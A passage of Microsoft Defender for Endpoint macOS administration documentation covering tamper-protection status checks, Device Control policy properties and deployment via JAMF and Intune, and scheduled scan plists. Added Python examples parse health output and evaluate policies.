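    """Return {field: value}; a `[managed]` tag becomes <field>_is_managed = True."""
    raw, key = {}, None
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            key = m.group(1)
            raw[key] = m.group(2)
        elif key is not None:            # wrapped continuation of the previous value
            raw[key] += " " + line.strip()
    fields = {}
    for name, value in raw.items():
        value = value.strip()
        if value.endswith("[managed]"):
            fields[name + "_is_managed"] = True
            value = value[: -len("[managed]")].rstrip()
        if value in ("true", "false"):
            fields[name] = value == "true"
        elif len(value) >= 2 and value[0] == value[-1] == '"':
            fields[name] = value[1:-1]
        elif value.startswith("["):
            fields[name] = json.loads(value)
        else:
            fields[name] = value
    return fields


def effective_level(managed=None, local=None, portal_block=False, licensed=True):
    """Precedence from the page: managed profile > mdatp config > portal flag > default."""
    if managed:
        return managed
    if local:
        return local
    if portal_block:
        return "block"
    return "audit" if licensed else "block"   # unlicensed machines fall back to block


def assess(fields, expected_source="mdm"):
    """Findings for a production machine, which should be managed and in block mode."""
    findings = []
    if not fields.get("feature_enabled_protection", False):
        findings.append("feature_enabled_protection is false: Defender does not report licensed")
    if fields.get("tamper_protection") != "block":
        findings.append(f"effective mode is {fields.get('tamper_protection')!r}, not 'block'")
    if fields.get("configuration_source") != expected_source:
        findings.append(f"configuration_source is {fields.get('configuration_source')!r}, "
                        f"expected {expected_source!r}: check how the profile was applied")
    if not fields.get("configuration_is_managed", False):
        findings.append("configuration_is_managed is false: a local admin can relax the mode")
    return findings


# Sample output copied from this page (mode set locally, exclusions from MDM).
SAMPLE_OUTPUT = """tamper_protection : "audit"
exclusions :
[{"path":"/usr/bin/ruby","team_id":"","signing_id":"com.apple.ruby","args":
["/usr/local/bin/global_mdatp_restarted.rb"]}] [managed]
feature_enabled_protection : true
feature_enabled_portal : true
configuration_source : "local"
configuration_local : "audit"
configuration_portal : "block"
configuration_default : "audit"
configuration_is_managed : false
"""

if __name__ == "__main__":
    fields = parse_health_details(SAMPLE_OUTPUT)
    print("effective:", fields["tamper_protection"], "source:", fields["configuration_source"])
    for finding in assess(fields):
        print("-", finding)
```

On the page's sample the script reports three findings: the effective mode is audit, the source is local rather than mdm, and the mode is not managed, which is exactly the state the Note above says a production machine must not be in.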

Note

You need to inspect Microsoft Defender's logs to get the same information prior to
version 101.98.71. See below for an example.
Console

$ sudo grep -F '[{tamperProtection}]: Feature state:' /Library/Logs/Microsoft/mdatp/microsoft_defender_core.log | tail -n 1

Device Control for macOS
Article • 10/11/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Defender for Business

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Requirements
Device Control for macOS has the following prerequisites:

Microsoft Defender for Endpoint entitlement (can be trial)
Minimum OS version: macOS 11 or higher
Minimum product version: 101.34.20

Overview
The Microsoft Defender for Endpoint Device Control feature enables you to:

Audit, allow, or prevent read, write, or execute access to removable storage; and
Manage iOS and portable devices, Apple APFS encrypted devices, and Bluetooth media,
with or without exclusions.

Prepare your endpoints

Microsoft Defender for Endpoint entitlement (can be trial)

Minimum OS version: macOS 11 or higher

Deploy Full Disk Access: you may already have created and deployed
https://github.com/microsoft/mdatp-xplat/blob/master/macos/mobileconfig/profiles/fulldisk.mobileconfig
for other MDE features. You need to grant Full Disk Access permission for a new
application: com.microsoft.dlp.daemon.
Enable Device Control in the MDE Preference setting:

Data Loss Prevention (DLP)/Features/

For Feature Name, enter "DC_in_dlp"

For State, enter "enabled"

Example 1: JAMF using schema.json

Example 2: demo.mobileconfig

XML

<key>dlp</key>
<dict>
<key>features</key>
<array>
<dict>
<key>name</key>
<string>DC_in_dlp</string>
<key>state</key>
<string>enabled</string>
</dict>
</array>
</dict>

Minimum product version: 101.91.92 or higher


Run mdatp version through Terminal to see the product version on your client
machine:

Device Control for macOS properties

Device Control for macOS consists of a global setting, group creation, and access policy
rule creation:

- The global setting, called 'settings', allows you to define the global environment.
- The group, called 'groups', allows you to create media groups. For example, an
  authorized USB group or an encrypted USB group.
- The access policy rule, called 'rules', allows you to create a policy that restricts
  each group. For example, only allow authorized users Write access to the authorized
  USB group.

Here are the properties you can use when you create the group and policy.

Note

We recommend you use the examples on GitHub to understand the properties:
mdatp-devicecontrol/Removable Storage Access Control Samples/macOS/policy
at main - microsoft/mdatp-devicecontrol (github.com).

You can also use the scripts at mdatp-devicecontrol/Removable Storage Access
Control Samples/macOS/policy/scripts at main - microsoft/mdatp-devicecontrol
(github.com) to translate a Windows Device Control policy to a macOS Device
Control policy, or to translate a macOS Device Control V1 policy to this V2 policy.

Settings

features
    Description: Feature-specific configurations
    Options: You can set disable to false or true for the following features:
        - removableMedia
        - appleDevice
        - portableDevice, including camera or PTP media
        - bluetoothDevice
    The default is true, so if you don't configure this value, a custom policy you
    create for removableMedia will not apply, because the feature is disabled by
    default.

global
    Description: Set default enforcement
    Options: You can set defaultEnforcement to
        - allow (default)
        - deny

ux
    Description: Hyperlink on notification.
    Options: You can set a navigationTarget: string. Example:
    "http://www.microsoft.com"

Group

$type
    Description: The kind of group
    Options: "device"

id
    Description: GUID, a unique ID, represents the group and will be used in the
    policy.
    Options: You can generate the ID through New-Guid (Microsoft.PowerShell.Utility)
    in PowerShell, or the uuidgen command on macOS.

name
    Description: Friendly name for the group.
    Options: string

query
    Description: The media coverage under this group
    Options: See the query properties tables below for details.

Query
Device Control supports two kinds of queries:

Query type 1 is as follows:

$type
    Description: Identify the logical operation to perform on the clauses
    Options:
        - all: The attributes under the clauses are in an AND relationship. For
          example, if the administrator puts vendorId and serialNumber, for every
          connected USB the system checks whether the USB meets both values.
        - and: equivalent to all
        - any: The attributes under the clauses are in an OR relationship. For
          example, if the administrator puts vendorId and serialNumber, for every
          connected USB the system does the enforcement as long as the USB has either
          an identical vendorId or an identical serialNumber value.
        - or: equivalent to any

clauses
    Description: Use media device properties to set the group condition.
    Options: An array of clause objects that are evaluated to determine group
    membership. See the Clause section below.

Query type 2 is as follows:

$type
    Description: Identify the logical operation to perform on the subquery
    Options: not: logical negation of a query

query
    Description: A subquery
    Options: A query which will be negated.

Clause

Clause properties

$type
    Description: The type of clause
    Options: See the following table for supported clauses.

value
    Description: $type specific value to use

Supported clauses

clause $type | value | Description
primaryId | One of: apple_devices, removable_media_devices, portable_devices, bluetooth_devices |
vendorId | 4 digit hexadecimal string | Matches a device's vendor ID
productId | 4 digit hexadecimal string | Matches a device's product ID
serialNumber | string | Matches a device's serial number. Doesn't match if the device doesn't have a serial number.
encryption | apfs | Match if a device is apfs-encrypted.
groupId | UUID string | Match if a device is a member of another group. The value represents the UUID of the group to match against. The group must be defined within the policy prior to the clause.

Access policy rule

id
    Description: GUID, a unique ID, represents the rule and will be used in the policy.
    Options: New-Guid (Microsoft.PowerShell.Utility) in PowerShell, or uuidgen on macOS

name
    Description: String, the name of the policy; it is displayed on the toast based on
    the policy setting.

includeGroups
    Description: The group(s) that the policy will be applied to. If multiple groups
    are specified, the policy applies to any media in all those groups. If not
    specified, the rule applies to all devices.
    Options: The id value inside the group must be used in this instance. If multiple
    groups are in the includeGroups, it's AND.
    "includeGroups": ["3f082cd3-f701-4c21-9a6a-ed115c28e217"]

excludeGroups
    Description: The group(s) that the policy doesn't apply to.
    Options: The id value inside the group must be used in this instance. If multiple
    groups are in the excludeGroups, it's OR.

entries
    Description: One rule can have multiple entries; each entry with a unique GUID
    tells Device Control one restriction.
    Options: See the entry properties table later in this article for details.

The following table lists the properties you can use in your entry:

$type
    Options:
        - removableMedia
        - appleDevice
        - PortableDevice
        - bluetoothDevice
        - generic

enforcement
    Options: $type:
        - allow
        - deny
        - auditAllow
        - auditDeny

    When $type allow is selected, the options value supports:
        - disable_audit_allow: Even if Allow happens and auditAllow is configured,
          the system won't send an event.

    When $type deny is selected, the options value supports:
        - disable_audit_deny: Even if Block happens and auditDeny is configured,
          the system won't show a notification or send an event.

    When $type auditAllow is selected, the options value supports:
        - send_event

    When $type auditDeny is selected, the options value supports:
        - send_event
        - show_notification

access
    Description: Specify one or more access rights for this rule. These may include
    either device-specific granular permissions or broader generic permissions. See
    the table below for more details on the valid access types for a given entry
    $type.

id
    Options: UUID

The following tables describe the enforcement object used in an entry:

Enforcement

Enforcement property name

$type
    Description: The type of enforcement
    Options: See the table below for supported enforcements

options
    Description: $type specific value to use
    Options: An array of options for the entry. May be omitted if no options are
    desired.

Enforcement type

Enforcement $type [string] | options values | Description
allow | disable_audit_allow | Even if Allow happens and auditAllow is configured, the system won't send an event.
deny | disable_audit_deny | Even if Block happens and auditDeny is configured, the system won't show a notification or send an event.
auditAllow | send_event | Send telemetry
auditDeny | send_event | Send telemetry
auditDeny | show_notification | Display Block UX to user

Access types

entry $type | 'access' values [string] | Generic Access | Description
appleDevice | backup_device | generic_read |
appleDevice | update_device | generic_write |
appleDevice | download_photos_from_device | generic_read | download photo(s) from the specific iOS device to local machine
appleDevice | download_files_from_device | generic_read | download file(s) from the specific iOS device to local machine
appleDevice | sync_content_to_device | generic_write | sync content from local machine to specific iOS device
portableDevice | download_files_from_device | generic_read |
portableDevice | send_files_to_device | generic_write |
portableDevice | download_photos_from_device | generic_read |
portableDevice | debug | generic_execute | ADB tool control
removableMedia | read | generic_read |
removableMedia | write | generic_write |
removableMedia | execute | generic_execute | generic_read
bluetoothDevice | download_files_from_device | |
bluetoothDevice | send_files_to_device | generic_write |
generic | generic_read | | Equivalent to setting all access values denoted in this table that map to generic_read.
generic | generic_write | | Equivalent to setting all access values denoted in this table that map to generic_write.
generic | generic_execute | | Equivalent to setting all access values denoted in this table that map to generic_execute.

End-user experience
Once Deny happens and the notification is enabled in the policy, the end user sees a
dialog.

Status
Use mdatp health --details device_control to inspect the Device Control status:

Console

active : ["v2"]
v1_configured : false
v1_enforcement_level : unavailable
v2_configured : true
v2_state : "enabled"
v2_sensor_connection : "created_ok"
v2_full_disk_access : "approved"

- active - feature version, you should see ["v2"]. (Device Control is enabled, but
  not configured.)
    - [] - Device Control is not configured on this machine
    - ["v1"] - You are on a preview version of Device Control. Please migrate to
      version 2 using this guide. v1 is considered obsolete and not described in
      this documentation.
    - ["v1","v2"] - You have both v1 and v2 enabled. Please offboard from v1.
- v1_configured - v1 configuration is applied
- v1_enforcement_level - when v1 is enabled
- v2_configured - v2 configuration is applied
- v2_state - v2 status, enabled if fully working
- v2_sensor_connection - if created_ok, then Device Control established a connection
  to the system extension
- v2_full_disk_access - if not approved, then Device Control cannot prevent some
  or all operations
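The field meanings above can be turned into an automated health check. The following is an added example, not Microsoft's code: it parses the `key : value` output of `mdatp health --details device_control` and reports the conditions the list above describes (v1 still active, no policy applied, sensor not connected, Full Disk Access missing). The sample outputs are constructed; the value `"not_approved"` in the second sample is a placeholder for any value other than `"approved"`.

```python
"""Added example (not Microsoft's code): interpret `mdatp health --details device_control`
output according to the field descriptions in this article."""
import json

# Constructed sample: the healthy output shown in the article.
HEALTHY_SAMPLE = """\
active : ["v2"]
v1_configured : false
v1_enforcement_level : unavailable
v2_configured : true
v2_state : "enabled"
v2_sensor_connection : "created_ok"
v2_full_disk_access : "approved"
"""

# Constructed sample: v1 and v2 both enabled, and Full Disk Access not granted.
# "not_approved" is a placeholder, not a value documented by the article.
BROKEN_SAMPLE = """\
active : ["v1","v2"]
v1_configured : true
v1_enforcement_level : audit
v2_configured : true
v2_state : "enabled"
v2_sensor_connection : "created_ok"
v2_full_disk_access : "not_approved"
"""


def parse_health(text):
    """Turn `key : value` lines into a dict. Values that are valid JSON
    (["v2"], true, "enabled") are decoded; bare words such as `unavailable`
    are kept as strings."""
    fields = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, _, raw = line.partition(":")
        raw = raw.strip()
        try:
            fields[key.strip()] = json.loads(raw)
        except ValueError:
            fields[key.strip()] = raw
    return fields


def assess(fields):
    """Return a list of findings; an empty list means Device Control v2 is fully working."""
    findings = []
    active = fields.get("active", [])
    if active == []:
        findings.append("Device Control is not configured on this machine")
    if "v1" in active:
        findings.append("v1 is active: migrate to v2 and offboard from v1")
    if "v2" in active:
        if not fields.get("v2_configured"):
            findings.append("v2 is active but no v2 policy is applied")
        if fields.get("v2_state") != "enabled":
            findings.append(f"v2_state is {fields.get('v2_state')!r}, expected 'enabled'")
        if fields.get("v2_sensor_connection") != "created_ok":
            findings.append("Device Control has no connection to the system extension")
        if fields.get("v2_full_disk_access") != "approved":
            findings.append("Full Disk Access is not approved: some or all operations "
                            "cannot be prevented")
    return findings


if __name__ == "__main__":
    for name, sample in (("healthy", HEALTHY_SAMPLE), ("broken", BROKEN_SAMPLE)):
        problems = assess(parse_health(sample))
        print(f"{name}: {'OK' if not problems else '; '.join(problems)}")
```

On a real device, pipe the command output into `parse_health` (for example via `subprocess.run(["mdatp", "health", "--details", "device_control"], capture_output=True, text=True).stdout`) and treat a non-empty findings list as a deployment failure in your fleet reporting.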

Reporting
You'll be able to see the policy event on Advanced hunting and Device Control report.
For more information, see Protect your organization's data with Device Control.

Scenarios
Here are some common scenarios to help you familiarize yourself with Microsoft Defender
for Endpoint and Microsoft Defender for Endpoint Device Control.

Scenario 1: Deny any removable media but allow specific USBs

In this scenario, you need to create two groups: one group for any removable media,
and another group for approved USBs. You also need to create an access policy
rule.

Step 1: Settings: enable Device Control and set Default Enforcement

JSON

"settings": {
    "features": {
        "removableMedia": {
            "disable": false
        }
    },
    "global": {
        "defaultEnforcement": "allow"
    },
    "ux": {
        "navigationTarget": "http://www.deskhelp.com"
    }
}

Step 2: Groups: Create any removable media group and approved-USBs group

1. Create a group to cover any removable media devices.
2. Create a group for approved USBs.
3. Combine those groups into one 'groups' array.

JSON

"groups": [
    {
        "$type": "device",
        "id": "3f082cd3-f701-4c21-9a6a-ed115c28e211",
        "name": "All Removable Media Devices",
        "query": {
            "$type": "all",
            "clauses": [
                {
                    "$type": "primaryId",
                    "value": "removable_media_devices"
                }
            ]
        }
    },
    {
        "$type": "device",
        "id": "3f082cd3-f701-4c21-9a6a-ed115c28e212",
        "name": "Kingston Devices",
        "query": {
            "$type": "all",
            "clauses": [
                {
                    "$type": "vendorId",
                    "value": "0951"
                }
            ]
        }
    }
]

Step 3: Rules: Create Deny policy for unallowed USBs

Create an access policy rule and put it into 'rules':

JSON

"rules": [
    {
        "id": "772cef80-229f-48b4-bd17-a69130092981",
        "name": "Deny RWX to all Removable Media Devices except Kingston",
        "includeGroups": [
            "3f082cd3-f701-4c21-9a6a-ed115c28e211"
        ],
        "excludeGroups": [
            "3f082cd3-f701-4c21-9a6a-ed115c28e212"
        ],
        "entries": [
            {
                "$type": "removableMedia",
                "id": "A7CEE2F8-CE34-4B34-9CFE-4133F0361035",
                "enforcement": {
                    "$type": "deny"
                },
                "access": [
                    "read",
                    "write",
                    "execute"
                ]
            },
            {
                "$type": "removableMedia",
                "id": "18BA3DD5-4C9A-458B-A756-F1499FE94FB4",
                "enforcement": {
                    "$type": "auditDeny",
                    "options": [
                        "send_event",
                        "show_notification"
                    ]
                },
                "access": [
                    "read",
                    "write",
                    "execute"
                ]
            }
        ]
    }
]

In this case, there is only one access policy rule, but if you have multiple, make sure
to add them all into 'rules'.
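To see how the properties described earlier (group queries with all/any/not clauses, includeGroups as AND, excludeGroups as OR, and the features.*.disable default) combine into a decision, the following added example evaluates the Scenario 1 policy against a few constructed devices. It is illustrative code written for this article, not Microsoft's implementation: the device dictionaries and their vendor/product/serial values are constructed, and the precedence used when several entries match (a matching deny wins, then a matching allow, otherwise settings.global.defaultEnforcement) is an assumption of this example that the article does not spell out.

```python
"""Added example (not Microsoft's code): evaluate a macOS Device Control v2 policy
against a connected device, using the group/query/clause semantics and the
includeGroups (AND) / excludeGroups (OR) rules described in this article."""
import copy
import json

# The Scenario 1 policy from this article, assembled into one document.
POLICY = json.loads(r'''{
  "settings": {
    "features": {"removableMedia": {"disable": false}},
    "global": {"defaultEnforcement": "allow"},
    "ux": {"navigationTarget": "http://www.deskhelp.com"}
  },
  "groups": [
    {"$type": "device", "id": "3f082cd3-f701-4c21-9a6a-ed115c28e211",
     "name": "All Removable Media Devices",
     "query": {"$type": "all", "clauses": [
       {"$type": "primaryId", "value": "removable_media_devices"}]}},
    {"$type": "device", "id": "3f082cd3-f701-4c21-9a6a-ed115c28e212",
     "name": "Kingston Devices",
     "query": {"$type": "all", "clauses": [{"$type": "vendorId", "value": "0951"}]}}
  ],
  "rules": [
    {"id": "772cef80-229f-48b4-bd17-a69130092981",
     "name": "Deny RWX to all Removable Media Devices except Kingston",
     "includeGroups": ["3f082cd3-f701-4c21-9a6a-ed115c28e211"],
     "excludeGroups": ["3f082cd3-f701-4c21-9a6a-ed115c28e212"],
     "entries": [
       {"$type": "removableMedia", "id": "A7CEE2F8-CE34-4B34-9CFE-4133F0361035",
        "enforcement": {"$type": "deny"}, "access": ["read", "write", "execute"]},
       {"$type": "removableMedia", "id": "18BA3DD5-4C9A-458B-A756-F1499FE94FB4",
        "enforcement": {"$type": "auditDeny", "options": ["send_event", "show_notification"]},
        "access": ["read", "write", "execute"]}]}
  ]
}''')

# Constructed devices; attribute names mirror the clause $type values.
KINGSTON_USB = {"primaryId": "removable_media_devices", "vendorId": "0951",
                "productId": "1666", "serialNumber": "CONSTRUCTED-SN-1"}
OTHER_USB = {"primaryId": "removable_media_devices", "vendorId": "1234",
             "productId": "abcd", "serialNumber": None}
IPHONE = {"primaryId": "apple_devices"}


def clause_matches(clause, device, groups):
    kind, value = clause["$type"], clause["value"]
    if kind == "groupId":            # membership in a group defined earlier in the policy
        return value in groups
    if kind == "serialNumber":       # a device without a serial number never matches
        return device.get("serialNumber") is not None and device["serialNumber"] == value
    return device.get(kind) == value  # primaryId, vendorId, productId, encryption


def query_matches(query, device, groups):
    kind = query["$type"]
    if kind == "not":                # query type 2: negate the subquery
        return not query_matches(query["query"], device, groups)
    results = [clause_matches(c, device, groups) for c in query["clauses"]]
    return all(results) if kind in ("all", "and") else any(results)  # any / or


def member_groups(policy, device):
    """Ids of the groups the device belongs to, evaluated in policy order so a
    groupId clause can only see groups defined before it."""
    groups = set()
    for group in policy["groups"]:
        if query_matches(group["query"], device, groups):
            groups.add(group["id"])
    return groups


def evaluate(policy, device, access):
    """Return (verdict, audit_options) for one access right such as "write".
    Precedence is this example's assumption: deny beats allow, and with no
    matching entry settings.global.defaultEnforcement applies."""
    groups = member_groups(policy, device)
    features = policy["settings"].get("features", {})
    matched = []                     # (enforcement $type, options) of applicable entries
    for rule in policy["rules"]:
        include = rule.get("includeGroups", [])
        if include and not all(g in groups for g in include):          # AND
            continue
        if any(g in groups for g in rule.get("excludeGroups", [])):    # OR
            continue
        for entry in rule["entries"]:
            # A feature is disabled unless settings.features.<name>.disable is false.
            if features.get(entry["$type"], {}).get("disable", True):
                continue
            if access in entry["access"]:
                enf = entry["enforcement"]
                matched.append((enf["$type"], set(enf.get("options", []))))
    kinds = {k for k, _ in matched}
    if "deny" in kinds:
        verdict = "deny"
    elif "allow" in kinds:
        verdict = "allow"
    else:
        verdict = policy["settings"]["global"].get("defaultEnforcement", "allow")
    audit = set().union(*(o for k, o in matched if k == "audit" + verdict.capitalize()))
    return verdict, audit


def with_feature_disabled(policy, feature):
    """Copy of the policy with settings.features.<feature>.disable set to true."""
    clone = copy.deepcopy(policy)
    clone["settings"].setdefault("features", {})[feature] = {"disable": True}
    return clone


if __name__ == "__main__":
    for name, dev in (("Kingston", KINGSTON_USB), ("other USB", OTHER_USB), ("iPhone", IPHONE)):
        print(name, "write ->", evaluate(POLICY, dev, "write"))
```

The second check in `evaluate` is the one that most often surprises administrators: if `settings.features.removableMedia.disable` is left at its default of true, the rule above matches the device but no entry is considered, and the device falls back to the default enforcement.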

See also
Deploy Device Control by using Intune
Deploy Device Control by using JAMF
Deploy Device Control manually
macOS Device Control frequently asked questions (FAQ)


Deploy and manage Device Control
using JAMF
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Defender for Business

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

The Microsoft Defender for Endpoint Device Control feature enables you to audit, allow, or
prevent read, write, or execute access to removable storage, and allows you to
manage iOS and portable devices and Bluetooth media with or without exclusions.

Licensing requirements
Before you get started with Removable Storage Access Control, you must confirm your
Microsoft 365 subscription . To access and use Removable Storage Access Control, you
must have Microsoft 365 E3.

Important

This article contains information about third-party tools. This is provided to help
complete integration scenarios, however, Microsoft does not provide
troubleshooting support for third-party tools.
Contact the third-party vendor for support.

Deploy policy by using JAMF

Step 1: Create policy JSON

Now that you have 'settings', 'groups', and 'rules', combine them into one JSON file.
Here is the demo file: mdatp-devicecontrol/deny_removable_media_except_kingston.json at
main - microsoft/mdatp-devicecontrol (github.com). Make sure to validate your policy
against the JSON schema so your policy format is correct:
mdatp-devicecontrol/device_control_policy_schema.json at main -
microsoft/mdatp-devicecontrol (github.com).

See Device Control for macOS for information about settings, rules and groups.

Step 2: Update MDE Preferences Schema


The MDE Preferences schema has been updated to include the new
deviceControl/policy key. The existing MDE Preferences configuration profile should be
updated to use the new schema file's content.

Step 3: Add Device Control Policy to MDE Preferences


A new 'Device Control' property will now be available to add to the UX.

1. Select the topmost Add/Remove properties button, then select Device Control
and press Apply.

2. Next, scroll down until you see the Device Control property (it will be the
bottommost entry), and select Add/Remove properties directly underneath it.

3. Select Device Control Policy, and then click Apply.


4. To finish, copy and paste the Device Control policy JSON into the text box, and
save your changes to the configuration profile.

See also
Device Control for macOS
Deploy and manage Device Control using Intune
macOS Device Control frequently asked questions (FAQ)


Deploy and manage Device Control
using Intune
Article • 02/21/2024

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Defender for Business

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

The Microsoft Defender for Endpoint Device Control feature enables you to audit, allow, or
prevent read, write, or execute access to removable storage, and allows you to
manage iOS and portable devices and Bluetooth media with or without exclusions.

Licensing requirements
Before you get started with Removable Storage Access Control, you must confirm your
Microsoft 365 subscription . To access and use Removable Storage Access Control, you
must have Microsoft 365 E3.

Deploy policy by using Intune

Step 1: Build mobileconfig file

Now that you have groups, rules, and settings, replace the corresponding values in the
mobileconfig file and put them under the Device Control node. Here's the demo file:
mdatp-devicecontrol/demo.mobileconfig at main - microsoft/mdatp-devicecontrol
(github.com). Make sure to validate your policy against the JSON schema so that
your policy format is correct: mdatp-devicecontrol/device_control_policy_schema.json at
main - microsoft/mdatp-devicecontrol (github.com).

Note

See Device Control for macOS for information about settings, rules and groups.

Deploy the mobileconfig file using Intune
You can deploy the mobileconfig file through https://endpoint.microsoft.com/ >
Devices > macOS:

- select 'Create profile'
- select 'Templates' and 'Custom'

See also
Device Control for macOS
Deploy and manage Device Control using jamf
macOS Device Control frequently asked questions (FAQ)


macOS Device Control policies
frequently asked questions (FAQ)
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Defender for Business

This article provides answers to frequently asked questions about Device Control
capabilities in Microsoft Defender for Endpoint.

Questions | Answers

How do I know whether the machine is Device Control enabled, and what is the Default
Enforcement?

Answer: Run mdatp device-control policy preferences list to see all the iOS policies on this
machine.

How do I know whether the policy has been delivered to the client machine?

Answer: Run mdatp device-control policy rules list to see all the iOS policies on this
machine.

Answer 2: Run mdatp device-control policy groups list to see all the iOS groups on this
machine.

See also
Device Control for macOS
Deploy and manage Device Control using Intune
Deploy and manage Device Control using jamf


Schedule scans with Microsoft Defender
for Endpoint on macOS
Article • 02/21/2024

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Important

Some information relates to a pre-released product feature in public preview which
may be substantially modified before it's commercially released. Microsoft makes
no warranties, express or implied, with respect to the information provided here.

Note

The built-in Scheduled Scan is currently in public preview. Review the prerequisites
carefully.

Schedule a scan built-in to Microsoft Defender for Endpoint on macOS

While you can start a threat scan at any time with Microsoft Defender for Endpoint, your
enterprise might benefit from scheduled or timed scans. For example, you can schedule
a scan to run at the beginning of every workday or week.

There are three types of scheduled scans that are configurable: hourly, daily, and weekly
scans. Hourly and daily scheduled scans are always run as quick scans; weekly scans can
be configured to be either quick or full scans. It is possible to have all three types of
scheduled scans at the same time. See the samples below.

Prerequisites:

- Platform Update version: 101.23122.0005 or newer
- Beta Channel (formerly Insiders-Fast), or Current Channel (Preview) (formerly
  Insiders-Slow)

Schedule a scan with Microsoft Defender for
Endpoint on macOS
You can create a scheduled scan for your macOS, which is built in to Microsoft Defender
for Endpoint on macOS.

For more information on the .plist file format used here, see About Information Property
List Files at the official Apple developer website.

The following sample shows the daily and/or weekly configuration for the scheduled
scan on macOS.

Tip

Schedules are based on the local time zone of the device.

Parameter | Acceptable values

scheduledScan
    enabled or disabled

scanType
    quick or full

ignoreExclusions
    true or false

lowPriorityScheduledScan
    true or false

dayOfWeek
    The range is between 0 and 8:
        - 0: Everyday
        - 1: Sunday
        - 2: Monday
        - 3: Tuesday
        - 4: Wednesday
        - 5: Thursday
        - 6: Friday
        - 7: Saturday
        - 8: Never

timeOfDay
    Specifies the time of day, as the number of minutes after midnight, to perform a
    scheduled scan. The time refers to the local time on the computer. If you don't
    specify a value for this parameter, a scheduled scan runs at a default time of two
    hours after midnight.

interval
    0 (never), every 1 (hour) to 24 (hours, 1 scan per day)

randomizeScanStartTime
    Only applicable for daily quick scans or weekly quick/full scans. Randomize the
    start time of the scan by up to the specified number of hours. For example, if a
    scan is scheduled for 2 p.m. and randomizeScanStartTime is set to 2, the scan
    commences at a random time between 2 p.m. and 4 p.m.

Your scheduled scan runs at the date, time, and frequency you defined in your plist.

Example 1: Schedule a daily quick scan and weekly full scan using a plist

In the following example, the daily quick scan configuration is set to run at 885 minutes
after midnight (2:45 p.m.).
The weekly configuration is set to run a full scan on Wednesday at 880 minutes after
midnight (2:40 p.m.). And it's set to ignore exclusions and run a low priority scan.

The following code shows the schema you need to use to schedule scans according to
the requirements above.

1. Open a text editor and use this example as a guide for your own scheduled scan
file.

XML

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>features</key>
    <dict>
        <key>scheduledScan</key>
        <string>enabled</string>
    </dict>
    <key>scheduledScan</key>
    <dict>
        <key>ignoreExclusions</key>
        <true/>
        <key>lowPriorityScheduledScan</key>
        <true/>
        <key>dailyConfiguration</key>
        <dict>
            <key>timeOfDay</key>
            <integer>885</integer>
        </dict>
        <key>weeklyConfiguration</key>
        <dict>
            <key>dayOfWeek</key>
            <integer>4</integer>
            <key>timeOfDay</key>
            <integer>880</integer>
            <key>scanType</key>
            <string>full</string>
        </dict>
    </dict>
</dict>
</plist>

2. Save the file as com.microsoft.wdav.plist.

Example 2: Schedule an hourly quick scan, a daily quick scan, and weekly full scan using a plist

In the following example, an hourly quick scan will run every 6 hours, a daily quick scan
configuration is set to run at 885 minutes after midnight (2:45 p.m.), and a weekly full
scan will run on Wednesdays at 880 minutes after midnight (2:40 p.m.).

1. Open a text editor and use this example.

XML

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>features</key>
    <dict>
        <key>scheduledScan</key>
        <string>enabled</string>
    </dict>
    <key>scheduledScan</key>
    <dict>
        <key>ignoreExclusions</key>
        <true/>
        <key>lowPriorityScheduledScan</key>
        <true/>
        <key>dailyConfiguration</key>
        <dict>
            <key>timeOfDay</key>
            <integer>885</integer>
            <key>interval</key>
            <string>1</string>
        </dict>
        <key>weeklyConfiguration</key>
        <dict>
            <key>dayOfWeek</key>
            <integer>4</integer>
            <key>timeOfDay</key>
            <integer>880</integer>
            <key>scanType</key>
            <string>full</string>
        </dict>
    </dict>
</dict>
</plist>

2. Save the file as com.microsoft.wdav.plist.
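Hand-editing minute counts and weekday numbers is error prone, so the following added example (written for this article, not Microsoft's code) builds the com.microsoft.wdav.plist scheduled-scan dictionary from clock times and weekday names, checks each value against the parameter table above, and serialises it with Python's standard plistlib. The function names and keyword arguments are this example's own; the plist keys are the ones used in Example 1 and Example 2.

```python
"""Added example (not Microsoft's code): generate the scheduled-scan section of
com.microsoft.wdav.plist from human-readable values, validating them against
the ranges documented in this article."""
import plistlib

# dayOfWeek values from the parameter table (0 = every day, 8 = never).
DAYS = {"everyday": 0, "sunday": 1, "monday": 2, "tuesday": 3, "wednesday": 4,
        "thursday": 5, "friday": 6, "saturday": 7, "never": 8}


def minutes_after_midnight(hhmm):
    """'14:45' -> 885, the unit that timeOfDay expects (device-local time)."""
    hours, minutes = (int(part) for part in hhmm.split(":"))
    if not (0 <= hours < 24 and 0 <= minutes < 60):
        raise ValueError(f"invalid time of day {hhmm!r}")
    return hours * 60 + minutes


def scheduled_scan_config(daily_time=None, hourly_interval=None,
                          weekly_day=None, weekly_time=None, weekly_scan_type="quick",
                          ignore_exclusions=False, low_priority=False):
    """Return the dict that plistlib serialises to the profile shown in the examples.
    Hourly and daily scans are always quick scans, so only the weekly scan takes a
    scanType."""
    scan = {"ignoreExclusions": bool(ignore_exclusions),
            "lowPriorityScheduledScan": bool(low_priority)}
    if daily_time is not None or hourly_interval is not None:
        daily = {}
        if daily_time is not None:
            daily["timeOfDay"] = minutes_after_midnight(daily_time)
        if hourly_interval is not None:
            if not 0 <= hourly_interval <= 24:       # 0 = never, 1..24 hours
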